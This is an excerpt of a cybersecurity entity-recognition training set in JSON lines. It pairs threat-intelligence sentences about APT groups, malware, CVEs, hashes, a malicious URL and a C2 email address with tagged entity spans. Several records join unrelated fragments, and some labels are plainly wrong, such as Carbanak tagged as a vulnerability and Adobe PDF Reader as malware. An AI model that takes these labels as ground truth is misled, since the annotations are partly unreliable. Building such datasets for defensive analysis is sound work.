These emails contained malicious Microsoft Word documents with the aforementioned Flash Player zero-day hidden inside an embedded ActiveX object . BADCALL communicates on ports 443 and 8000 with a FakeTLS method.[6 ] Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.[7 ] BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.[8 ]", "spans": {"TOOL: Bookworm": [[73, 81]], "TOOL: PlugX": [[129, 134]], "ORGANIZATION: Unit 42": [[218, 225]], "TOOL: emails": [[234, 240]], "TOOL: Microsoft Word documents": [[261, 285]], "VULNERABILITY: Flash Player zero-day": [[310, 331]], "TOOL: ActiveX object": [[358, 372]], "MALWARE: BADCALL": [[375, 382]], "MALWARE: Bankshot": [[445, 453]], "MALWARE: BendyBear": [[545, 554]]}, "info": {"id": "cyberner_stix_train_004370", "source": "cyberner_stix_train"}} {"text": "Threat data from endpoints are combined with signals from email and data , identities , and apps in Microsoft 365 Defender ( previously Microsoft Threat Protection ) , which orchestrates detection , prevention , investigation , and response across domains , providing coordinated defense . Using information from the FireEye DTI cloud , FireEye observed that Ke3chang targeted a single firm . Double Loaded Zip File Delivers Nanocore Most malware sent via emails is packaged in archives such as ZIP, RAR, and 7z ) . 
How The Command are executed The malware add to the user environment variables and creates a pipe for covert communication and receiving the output .", "spans": {"SYSTEM: Microsoft 365 Defender": [[100, 122]], "SYSTEM: Microsoft Threat Protection": [[136, 163]], "ORGANIZATION: FireEye DTI": [[317, 328]], "ORGANIZATION: FireEye": [[337, 344]], "THREAT_ACTOR: Ke3chang": [[359, 367]], "TOOL: emails": [[456, 462]], "MALWARE: The malware": [[545, 556]]}, "info": {"id": "cyberner_stix_train_004371", "source": "cyberner_stix_train"}} {"text": "26fef238028ee4b5b8da631c77bfb44ada3d5db8129c45dea5df6a51c9ea5f55 33a9da16d096426c82f150e39fc4f9172677885cfeaedcff10c86414e88be802 34d000ee1e36efd10eb37e2b79d69249d5a85682a61390a89a1b9391c46bf2ba 4f6146956b50ae3a6e80a1c1f771dba848ba677064eb0e166df5804ac2766898 Dragos instead focuses on threat behaviors and appropriate detection and response . URL : http://nicoledotso.icu/debby/weatherford/Vydalyty . They can target a single company , maybe with the intention of stealing trade secrets or discrediting that company .", "spans": {"ORGANIZATION: Dragos": [[260, 266]], "URL: http://nicoledotso.icu/debby/weatherford/Vydalyty": [[350, 399]], "ORGANIZATION: single company": [[420, 434]]}, "info": {"id": "cyberner_stix_train_004372", "source": "cyberner_stix_train"}} {"text": ") embedded in the executable and prepares the execution of a new layer of VM decoding . DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor . The encoded payload is additionally encrypted with AES128 and further obfuscated with XOR in an attempt to fool steganography detection tools . 
Once installed , the trojan could disrupt operations within systems and networks or exfiltrate confidential data .", "spans": {"TOOL: DROPSHOT": [[88, 96]], "TOOL: malware": [[119, 126]], "TOOL: XOR": [[265, 268]], "MALWARE: trojan": [[344, 350]]}, "info": {"id": "cyberner_stix_train_004373", "source": "cyberner_stix_train"}} {"text": "It should be noted that until this point , even though CosmicDuke had been in active use for over 4 years , and had undergone minor modifications and updates during that time , even the most recent CosmicDuke samples would often embed persistence components that date back to 2012 .", "spans": {"MALWARE: CosmicDuke": [[55, 65], [198, 208]]}, "info": {"id": "cyberner_stix_train_004374", "source": "cyberner_stix_train"}} {"text": "In fact , with full access to the compromised Android smartphone , the opportunities for criminals to wreak havoc are significant – such as erasing infected phones or launching man-in-the-middle ( MITM ) attacks . The group has carried out attacks most months since December 2017 . so the callback can deobfuscate multiple control flow flattenings . Based on available information Mandiant has not been able to assess a general location that the group operates from .", "spans": {"SYSTEM: Android smartphone": [[46, 64]], "THREAT_ACTOR: group": [[218, 223]], "ORGANIZATION: Mandiant": [[381, 389]]}, "info": {"id": "cyberner_stix_train_004375", "source": "cyberner_stix_train"}} {"text": "] com9oo91e [ . The actors successfully compromised a host of an Saudi government institutions on January 17 , 2016 , and maintained access for at least two weeks . Overall , the combination of a relatively high number of “ Shanghai ” registrations with obviously false registration examples in other registrations suggests a partially uncoordinated domain registration campaign from 2004 until present , in which some registrants tried to fabricate non-Shanghai locations but others did not . 
Monitor for changes made to windows registry keys and/or values that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: government institutions": [[71, 94]]}, "info": {"id": "cyberner_stix_train_004376", "source": "cyberner_stix_train"}} {"text": "It is considered to be the most advanced group of the three , and is focused on high-profile targets in the Middle East , North America , Europe and Asia .", "spans": {}, "info": {"id": "cyberner_stix_train_004377", "source": "cyberner_stix_train"}} {"text": "Display a message box .", "spans": {}, "info": {"id": "cyberner_stix_train_004378", "source": "cyberner_stix_train"}} {"text": "Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the trojan . In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems .", "spans": {"TOOL: Potao": [[20, 25]], "ORGANIZATION: U.S.-based defense": [[381, 399]], "ORGANIZATION: aerospace technologies": [[485, 507]], "ORGANIZATION: combat processes": [[510, 526]], "ORGANIZATION: naval defense systems": [[533, 554]]}, "info": {"id": "cyberner_stix_train_004379", "source": "cyberner_stix_train"}} {"text": "Windows Credential Editor ( WCE ) — obtains passwords from memory . gsecdump — obtains passwords from memory . winrar — compresses data for Exfiltration . 
nbtscan — scans NetBIOS name servers .", "spans": {"TOOL: Windows Credential Editor": [[0, 25]], "TOOL: WCE": [[28, 31]], "TOOL: gsecdump": [[68, 76]], "TOOL: winrar": [[111, 117]], "TOOL: nbtscan": [[155, 162]], "TOOL: NetBIOS": [[171, 178]]}, "info": {"id": "cyberner_stix_train_004380", "source": "cyberner_stix_train"}} {"text": "Machine translation of this tweet reads : “ Watch out for online banking : Emotet reloads TrickBot . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications .", "spans": {"MALWARE: Emotet": [[75, 81]], "MALWARE: TrickBot": [[90, 98]], "THREAT_ACTOR: APT41": [[111, 116]], "VULNERABILITY: exploit": [[153, 160]], "VULNERABILITY: CVE-2019-3396": [[170, 183]], "ORGANIZATION: financial": [[313, 322]], "ORGANIZATION: government": [[325, 335]], "ORGANIZATION: energy": [[338, 344]], "ORGANIZATION: chemical": [[347, 355]], "ORGANIZATION: telecommunications": [[362, 380]]}, "info": {"id": "cyberner_stix_train_004381", "source": "cyberner_stix_train"}} {"text": "The use of the client application differs from many other webshells that the actor would interact with in a browser window .", "spans": {}, "info": {"id": "cyberner_stix_train_004382", "source": "cyberner_stix_train"}} {"text": "During these intrusions , LEAD ’s objective was to steal sensitive data , including research materials , process documents , and project plans .", "spans": {"THREAT_ACTOR: LEAD": [[26, 30]]}, "info": {"id": "cyberner_stix_train_004383", "source": "cyberner_stix_train"}} {"text": "The communication with the server is a handshake using an encryption algorithm ( Camellia ) .", "spans": {}, "info": {"id": "cyberner_stix_train_004384", "source": "cyberner_stix_train"}} {"text": "Most mobile malware is designed to steal users ’ money , including 
SMS-Trojans , and lots of backdoors and Trojans . Emissary Panda has used many ways with the most notable being the exploits from the Hacking Team leak . In addition to the two compromised universities , thanks to the C&C URL format used by the attackers we have reasons to think that at least three additional Hong Kong universities may have been compromised using these same ShadowPad and Winnti variants . Further , NIST does not endorse any commercial products that may be mentioned on these sites .", "spans": {"TOOL: C&C": [[285, 288]], "MALWARE: ShadowPad": [[444, 453]], "MALWARE: Winnti": [[458, 464]], "ORGANIZATION: NIST": [[486, 490]]}, "info": {"id": "cyberner_stix_train_004385", "source": "cyberner_stix_train"}} {"text": "The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage . In 2015 , the SecureWorks documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": {"ORGANIZATION: SecureWorks": [[139, 150]], "THREAT_ACTOR: BRONZE UNION": [[166, 178]], "THREAT_ACTOR: TG-3390": [[211, 218]], "ORGANIZATION: CTU": [[229, 232]], "ORGANIZATION: People's Republic": [[267, 284]]}, "info": {"id": "cyberner_stix_train_004386", "source": "cyberner_stix_train"}} {"text": "The full list of banking applications targeted is included in the appendix . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . 
At a high level , Retriever is a .NET downloader that downloads secondary payloads from servers associated with Magic Hound .", "spans": {"MALWARE: Hussarini": [[131, 140]], "MALWARE: Retriever": [[299, 308]], "MALWARE: .NET downloader": [[314, 329]]}, "info": {"id": "cyberner_stix_train_004387", "source": "cyberner_stix_train"}} {"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005 .", "spans": {"MALWARE: bait document": [[5, 18]], "MALWARE: Word document": [[68, 81]], "VULNERABILITY: CVE-2012-0158": [[102, 115]], "THREAT_ACTOR: Turla": [[287, 292]], "MALWARE: Kazuar": [[353, 359]]}, "info": {"id": "cyberner_stix_train_004388", "source": "cyberner_stix_train"}} {"text": "Exodus is equipped with extensive collection and interception capabilities . In August 2017 , we found this threat group has developed yet another Trojan that they call ' Agent Injector ' with the specific purpose of installing the ISMAgent backdoor . These commands can be issued to a specific victim based on the UID generated on each target ( by using the disk serial and contextual information such as the hostname , the antivirus and the OS ) or to all of them . 
One explanation for this could be that that they used the region as a test zone ; another would be that the threat actor runs the operation from those locations , although it could also be a false flag meant to point the researchers on the wrong path .", "spans": {"MALWARE: Exodus": [[0, 6]], "THREAT_ACTOR: threat group": [[108, 120]], "TOOL: ISMAgent backdoor": [[232, 249]], "THREAT_ACTOR: threat actor": [[576, 588]]}, "info": {"id": "cyberner_stix_train_004389", "source": "cyberner_stix_train"}} {"text": "The malware , dubbed “ Judy ” , is an auto-clicking adware which was found on 41 apps developed by a Korean company . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China . If the target filename is incorrect or invalid the plugin file is deleted and the registry value is erased . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": {"MALWARE: Judy": [[23, 27]], "ORGANIZATION: gaming organizations": [[167, 187]], "MALWARE: OT malware": [[379, 389]]}, "info": {"id": "cyberner_stix_train_004390", "source": "cyberner_stix_train"}} {"text": "During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals . 
Similar to our approach with Symantec 's report on Hidden Lynx , we used Recorded Future to organize the technical details about the DeputyDog attacks to reveal technical information described in the open source reporting across multiple campaigns .", "spans": {"THREAT_ACTOR: APT33": [[30, 35]], "ORGANIZATION: oil refining": [[87, 99]], "ORGANIZATION: petrochemicals": [[104, 118]], "ORGANIZATION: Symantec": [[150, 158]]}, "info": {"id": "cyberner_stix_train_004391", "source": "cyberner_stix_train"}} {"text": "SPLM 64-bit modules already appeared to be at version 4 of the software by May of the year .", "spans": {"MALWARE: SPLM": [[0, 4]]}, "info": {"id": "cyberner_stix_train_004392", "source": "cyberner_stix_train"}} {"text": "Usually they would upload a clean version back on Google Play the very same day . US targets emerged in September 2017 with a small , targeted phishing campaign directed at select U.S. electric companies . In the ProCC campaigns , the downloaded files are Delphi binaries . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"SYSTEM: Google Play": [[50, 61]], "ORGANIZATION: electric companies": [[185, 203]], "THREAT_ACTOR: ProCC": [[213, 218]], "TOOL: Delphi": [[256, 262]], "THREAT_ACTOR: Adversaries": [[274, 285]]}, "info": {"id": "cyberner_stix_train_004393", "source": "cyberner_stix_train"}} {"text": "The second artifact – identified across this report as Artifact #2 – -has the following attributes :", "spans": {}, "info": {"id": "cyberner_stix_train_004394", "source": "cyberner_stix_train"}} {"text": "Heaven ’ s gate is still in use in 2017 Stage 2 : A second multi-platform virtual machine The 64-bit stage 2 malware implements another loader combined with another virtual machine . The HTA files contained job descriptions and links to job postings on popular employment websites . 
One of the payloads we encountered was encoded inside an image of Kaito Kuroba1 , the gentleman thief character from a popular Japanese manga series . Exploitation of CVE-2023 - 4966 will not crash the NSPPE process and generate memory core dump files .", "spans": {"MALWARE: HTA files": [[187, 196]], "VULNERABILITY: CVE-2023 - 4966": [[450, 465]]}, "info": {"id": "cyberner_stix_train_004395", "source": "cyberner_stix_train"}} {"text": "For example , the US ( with around 303k infections ) , Saudi Arabia ( 245k ) , Australia ( 141k ) and the UK ( 137k ) . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others . In addition , the contents of each Loader DLL E-TOOL differs from package to package , as does the encrypted data included in the ZIP file . This second , partially obfuscated web shell , named iisstart.aspx ( MD5 : 0fd9bffa49c76ee12e51e3b8ae0609ac ) , was more advanced and contained functions to interact with the file system .", "spans": {"ORGANIZATION: military personnel": [[206, 224]], "ORGANIZATION: businessmen": [[229, 240]], "TOOL: Loader": [[293, 299]], "TOOL: DLL E-TOOL": [[300, 310]], "SYSTEM: the file system": [[570, 585]]}, "info": {"id": "cyberner_stix_train_004396", "source": "cyberner_stix_train"}} {"text": "Parts of the PUTTER PANDA toolset and tradecraft have been previously documented , both by CrowdStrike , and in open source , where they are referred to as the MSUpdater group . 
In the previous pages we have presented our findings based on ESET detection telemetry and our analysis of Win32/Potao and Win32/FakeTC samples .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[13, 25]], "ORGANIZATION: CrowdStrike": [[91, 102]], "THREAT_ACTOR: MSUpdater group": [[160, 175]], "ORGANIZATION: ESET": [[240, 244]], "MALWARE: Win32/Potao": [[285, 296]], "MALWARE: Win32/FakeTC samples": [[301, 321]]}, "info": {"id": "cyberner_stix_train_004397", "source": "cyberner_stix_train"}} {"text": "In case of mha-report.doc the malicious activity triggered only when the show document button was clicked , when this event occurs the macro code calls a subroutine CommandButton1_Click() which in turn calls a malicious obfuscated function ( Bulbaknopka() ) .", "spans": {"FILEPATH: mha-report.doc": [[11, 25]], "TOOL: macro code": [[135, 145]], "TOOL: CommandButton1_Click()": [[165, 187]], "TOOL: Bulbaknopka()": [[242, 255]]}, "info": {"id": "cyberner_stix_train_004398", "source": "cyberner_stix_train"}} {"text": "Seeing that the developer did not take any measures to protect his identity , it seems likely that his intentions weren ’ t dishonest at first – and this is also supported by the fact that not all his published apps contained unwanted ads . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . 
Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"TOOL: DarkPulsar": [[241, 251]], "TOOL: backdoor": [[322, 330]], "MALWARE: sipauth32.tsp": [[339, 352]], "FILEPATH: Documents": [[415, 424]], "TOOL: flash": [[434, 439]], "VULNERABILITY: exploit": [[440, 447], [509, 516]], "TOOL: VirusTotal": [[520, 530]]}, "info": {"id": "cyberner_stix_train_004399", "source": "cyberner_stix_train"}} {"text": "Once the victim presses the Enable content button , the embedded macro is executed .", "spans": {"TOOL: Enable content button": [[28, 49]], "TOOL: macro": [[65, 70]]}, "info": {"id": "cyberner_stix_train_004400", "source": "cyberner_stix_train"}} {"text": "The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated .", "spans": {"TOOL: JHUHUGIT": [[4, 12]], "VULNERABILITY: Java zero-day": [[110, 123]], "VULNERABILITY: CVE-2015-2590": [[126, 139]], "MALWARE: Skipper": [[157, 164]], "THREAT_ACTOR: Turla": [[192, 197]], "MALWARE: Gazer": [[232, 237]]}, "info": {"id": "cyberner_stix_train_004401", "source": "cyberner_stix_train"}} {"text": "MCI is Saudi Arabia ’s Ministry of Commerce and Investment .", "spans": {"ORGANIZATION: MCI": [[0, 3]], "ORGANIZATION: Saudi Arabia ’s Ministry of Commerce and Investment": [[7, 58]]}, "info": {"id": "cyberner_stix_train_004402", "source": "cyberner_stix_train"}} {"text": "The second notable cluster comprises of two campaigns that were possibly aimed at gathering information on Georgia S-LOC-NATO relations .", "spans": {"ORGANIZATION: Georgia S-LOC-NATO": [[107, 125]]}, "info": {"id": "cyberner_stix_train_004403", "source": "cyberner_stix_train"}} {"text": "sendAll function used to spread malicious messages to the contact list . 
We also observed the actors uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": {"THREAT_ACTOR: actors": [[94, 100]], "TOOL: Sublime Text": [[172, 184]], "TOOL: Media application": [[224, 241]], "THREAT_ACTOR: Ke3chang": [[310, 318]], "TOOL: Java": [[340, 344]], "VULNERABILITY: zero-day": [[345, 353]], "VULNERABILITY: CVE-2012-4681": [[370, 383]], "FILEPATH: Microsoft Word": [[429, 443]], "VULNERABILITY: CVE-2010-3333": [[446, 459]], "MALWARE: Adobe PDF Reader": [[466, 482]], "VULNERABILITY: CVE-2010-2883": [[485, 498]]}, "info": {"id": "cyberner_stix_train_004404", "source": "cyberner_stix_train"}} {"text": "However , GPP does not treat new apps and updates any differently from an analysis perspective . According to a 49-page report published Thursday , all of the attacks are the work of Chinese government 's intelligence apparatus , which the report 's authors dub the Winnti Umbrella . Keylogging , ZXARPS ( IP and URL spoofing ) , and SYNFlood are some of the interesting features added to version 3.2 . The content of the form is legitimate and targets Ukrainian government organizations , as seen in the image below .", "spans": {"THREAT_ACTOR: Winnti Umbrella": [[266, 281]], "MALWARE: ZXARPS": [[297, 303]], "ORGANIZATION: Ukrainian government organizations": [[453, 487]]}, "info": {"id": "cyberner_stix_train_004405", "source": "cyberner_stix_train"}} {"text": "Once it has been installed , it requests permissions from the user so that it can steal sensitive data , manipulate SMS messages , and potentially infect contacts of the user . 
The main payload is usually Imminent Monitor RAT; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . both attributed to Chinese government affiliated groups .", "spans": {"MALWARE: Monitor RAT;": [[214, 226]], "MALWARE: LuminosityLink RAT": [[292, 310]], "MALWARE: NetWire RAT": [[313, 324]], "MALWARE: NjRAT": [[331, 336]]}, "info": {"id": "cyberner_stix_train_004406", "source": "cyberner_stix_train"}} {"text": "The iOS versions were available outside the app store , through phishing sites , and abused the Apple Developer Enterprise program . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . Depending on each sample , the content of document is either a fake resume application , or a letter from the Ministry of Justice in Lebanon or Saudi Arabia .", "spans": {"SYSTEM: iOS": [[4, 7]], "SYSTEM: app store": [[44, 53]], "ORGANIZATION: Apple Developer Enterprise": [[96, 122]], "VULNERABILITY: Carbanak": [[205, 213]], "ORGANIZATION: financial industry": [[230, 248]], "ORGANIZATION: payment providers": [[259, 276]], "ORGANIZATION: retail industry": [[279, 294]], "ORGANIZATION: PR companies": [[299, 311]], "MALWARE: fake resume application": [[377, 400]], "MALWARE: letter": [[408, 414]]}, "info": {"id": "cyberner_stix_train_004407", "source": "cyberner_stix_train"}} {"text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . 
Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": {"MALWARE: Catchamas": [[0, 9]]}, "info": {"id": "cyberner_stix_train_004408", "source": "cyberner_stix_train"}} {"text": "The Base64-encoded data is inserted into the following json object , which contains the individual names .", "spans": {}, "info": {"id": "cyberner_stix_train_004409", "source": "cyberner_stix_train"}} {"text": "Recent campaigns see APT28 group return to covert intelligence gathering operations in Europe and South America .", "spans": {"THREAT_ACTOR: APT28": [[21, 26]]}, "info": {"id": "cyberner_stix_train_004410", "source": "cyberner_stix_train"}} {"text": "] com svc [ . They are often targeted simultaneously with other ethnic minorities and religious groups in China . FireEye researchers spotted the malware when analyzing a recent attempted attack on an organization involved in shaping economic policy . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": {"ORGANIZATION: ethnic minorities": [[64, 81]], "ORGANIZATION: religious groups": [[86, 102]], "ORGANIZATION: FireEye": [[114, 121]], "TOOL: Google": [[320, 326]], "TOOL: Adobe": [[359, 364]]}, "info": {"id": "cyberner_stix_train_004412", "source": "cyberner_stix_train"}} {"text": "For Android 4.4.4 and older , the Trojan will patch method _Z30dvmHeapSourceStartupBeforeForkv from libdvm.so , and for Android 5 and newer it will patch method nativeForkAndSpecialize from libandroid_runtime.so . 
Desert Falcons is keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying . While there is a marked interest in Brazilian victims , our telemetry shows that their reach has extended to other countries in Latin America and beyond . Since the original announcement , we have observed several new attacks using the same exploit ( CVE-2013 - 0640 ) which drop other malware .", "spans": {"SYSTEM: Android 4.4.4": [[4, 17]], "SYSTEM: Android": [[120, 127]], "THREAT_ACTOR: Desert Falcons": [[214, 228]], "VULNERABILITY: CVE-2013 - 0640": [[681, 696]]}, "info": {"id": "cyberner_stix_train_004413", "source": "cyberner_stix_train"}} {"text": "Cannon logs into the trala.cosh2@post.cz account via POP3S looking for emails with a subject that matches the unique system identifier .", "spans": {"MALWARE: Cannon": [[0, 6]], "EMAIL: trala.cosh2@post.cz": [[21, 40]], "TOOL: emails": [[71, 77]]}, "info": {"id": "cyberner_stix_train_004414", "source": "cyberner_stix_train"}} {"text": "Furthermore , APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide . In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations .", "spans": {"THREAT_ACTOR: APT32": [[14, 19]], "ORGANIZATION: public sector": [[103, 116]], "THREAT_ACTOR: Scarlet Mimic": [[143, 156]], "ORGANIZATION: minority groups": [[212, 227]], "ORGANIZATION: supporters": [[245, 255]], "ORGANIZATION: anti-terrorist organizations": [[365, 393]]}, "info": {"id": "cyberner_stix_train_004415", "source": "cyberner_stix_train"}} {"text": "The permissions on the first version of the malware lay out the foundations of a spying trojan . 
Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block : a hostname and an IP address . While the malware used in the attacks were not very complicated by nature , these proved very effective . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": {"TOOL: Blue and Green Lambert samples": [[109, 139]]}, "info": {"id": "cyberner_stix_train_004416", "source": "cyberner_stix_train"}} {"text": "Figure 3 below shows a diff with the LuckyStrike macro on the left and Sofacy macro on the right , where everything except the file path and randomly generated values in the macro are exactly the same , including the obfuscation attempts that use concatenation to build strings .", "spans": {"TOOL: LuckyStrike": [[37, 48]], "TOOL: macro": [[49, 54], [78, 83], [174, 179]], "THREAT_ACTOR: Sofacy": [[71, 77]]}, "info": {"id": "cyberner_stix_train_004417", "source": "cyberner_stix_train"}} {"text": "In the case of this spyware , search for app named TikTok Pro . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . Kimsuky is a North Korean based threat group that has been active since at least September 2013 .", "spans": {"SYSTEM: TikTok Pro": [[51, 61]], "MALWARE: Okrum malware": [[96, 109]], "MALWARE: backdoors": [[202, 211]], "THREAT_ACTOR: Kimsuky": [[214, 221]]}, "info": {"id": "cyberner_stix_train_004418", "source": "cyberner_stix_train"}} {"text": "The extraction method is the same , but the encryption algorithm ( also XOR ) is much simpler . In July 2017 , FireEye observed APT34 targeting an organization in the Middle East using the POWRUNER PowerShell-based backdoor and the downloader BONDUPDATER , which includes a domain generation algorithm ( DGA ) for command and control . 
The alpha channel byte remains unchanged . In particular , we managed to gather details on an individual using the handle Hack520 , who we believe is connected to Winnti .", "spans": {"ORGANIZATION: FireEye": [[111, 118]], "THREAT_ACTOR: APT34": [[128, 133]], "TOOL: POWRUNER PowerShell-based backdoor": [[189, 223]], "TOOL: BONDUPDATER": [[243, 254]], "THREAT_ACTOR: Hack520": [[458, 465]], "THREAT_ACTOR: Winnti": [[499, 505]]}, "info": {"id": "cyberner_stix_train_004419", "source": "cyberner_stix_train"}} {"text": "] com md5c [ . APT41 operations against higher education , travel services , and news/media firms provide some indication that the group also tracks individuals and conducts surveillance . Mandiant has since identified POSHSPY in several other environments compromised by APT29 over the past two years .", "spans": {"THREAT_ACTOR: APT41": [[15, 20]], "ORGANIZATION: higher education": [[40, 56]], "ORGANIZATION: travel services": [[59, 74]], "ORGANIZATION: news/media firms": [[81, 97]], "ORGANIZATION: Mandiant": [[189, 197]], "MALWARE: POSHSPY": [[219, 226]], "THREAT_ACTOR: APT29": [[272, 277]]}, "info": {"id": "cyberner_stix_train_004420", "source": "cyberner_stix_train"}} {"text": "The actor sends an email to trala.cosh2@post.cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload .", "spans": {"TOOL: email": [[19, 24]], "EMAIL: trala.cosh2@post.cz": [[28, 47]], "MALWARE: Cannon": [[121, 127]], "MALWARE: Trojan": [[128, 134]]}, "info": {"id": "cyberner_stix_train_004421", "source": "cyberner_stix_train"}} {"text": "CTU researchers discovered evidence that the threat actors were not only leveraging the company 's remote access infrastructure , but were also using the company 's endpoint management platform , Altiris , to move laterally through the network .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "TOOL: Altiris": [[196, 203]]}, "info": {"id": "cyberner_stix_train_004422", "source": 
"cyberner_stix_train"}} {"text": "Adding connections to FakeSpy We have been seeing activity from XLoader since 2018 , and have since followed up our initial findings with a detailed research revealing a wealth of activity dating back to as early as January 2015 , which outlined a major discovery—its connection to FakeSpy . The APT18 then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system . Ping mode will also be set if exceptions occur more than three times during text . It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": {"MALWARE: FakeSpy": [[22, 29], [282, 289]], "MALWARE: XLoader": [[64, 71]], "THREAT_ACTOR: APT18": [[296, 301]], "TOOL: hcdLoader RAT": [[321, 334]]}, "info": {"id": "cyberner_stix_train_004423", "source": "cyberner_stix_train"}} {"text": "This fake notification tactic is used to redirect the user 's attention , meanwhile the app hides itself , making the user believe the app to be faulty . We can observe that the sample is very recent , created on Thursday , July 4 . The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report .", "spans": {"MALWARE: sample": [[178, 184]], "MALWARE: Winnti": [[322, 328]], "ORGANIZATION: Novetta": [[365, 372]]}, "info": {"id": "cyberner_stix_train_004424", "source": "cyberner_stix_train"}} {"text": "BLOCKER_EXTORTIONIST_START – display HTML page of the ransomware . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
Furthermore , the Leafminer arsenal server hosted a Python script to scan for this vulnerability .", "spans": {"MALWARE: Microsoft Word attachment": [[151, 176]], "VULNERABILITY: CVE-2017-0199": [[209, 222]], "TOOL: ZeroT Trojan": [[237, 249]], "TOOL: PlugX Remote Access Trojan": [[281, 307]], "TOOL: RAT": [[310, 313]], "THREAT_ACTOR: Leafminer": [[336, 345]], "MALWARE: Python script": [[370, 383]]}, "info": {"id": "cyberner_stix_train_004425", "source": "cyberner_stix_train"}} {"text": "From our analysis of the TrickMo mobile malware , it is apparent that TrickMo is designed to break the newest methods of OTP and , specifically , TAN codes often used in Germany . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . In the January 16 , 2018 attack , we observed OilRig attacking an organization it previously targeted in January 2017 .", "spans": {"MALWARE: TrickMo": [[25, 32], [70, 77]], "THREAT_ACTOR: Emissary Panda": [[191, 205]], "VULNERABILITY: vulnerability": [[235, 248]], "VULNERABILITY: CVE-2019-0604": [[284, 297]]}, "info": {"id": "cyberner_stix_train_004426", "source": "cyberner_stix_train"}} {"text": "Also , when an SMS arrives , the Trojan puts the phone into silent mode and switches off the screen so the user doesn ’ t notice that a new SMS has arrived . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . 
